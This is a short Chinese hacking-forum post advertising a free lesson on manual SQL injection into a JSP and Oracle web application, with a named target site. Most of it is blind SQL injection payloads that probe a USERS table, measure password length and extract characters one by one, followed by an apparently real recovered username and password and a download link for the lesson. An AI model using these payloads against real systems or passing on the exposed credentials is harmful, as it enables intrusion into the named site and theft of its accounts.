免费培训之脚本渗透第十一课:手工注入jsp+Oracle
饭客网络一周年免费培训之脚本渗透第十一课:手工注入jsp+Oracle教程名称:手工注入jsp+Oracle
讲师:I.n.c゛啵、 QQ:380547774
http://www.jwzx.com/
/*mysql
--mssql oracle
; mssql
and (select count (type) from USERS)>0--
username password
utype 8
and (select count (*) from USERS where type=8)=1--
and (select length (password) from USERS where type=8)>5--
账号长度:9密码长度:4
and (select ascii (substr (username,2,1)) from USERS where type=8)>97
108 l110n
账号: lntujwcgl密码:lyang
http://www.hackfans.com.cn/mianfei/jiaoben/jb11.rar 见识了,很好!
页:
[1]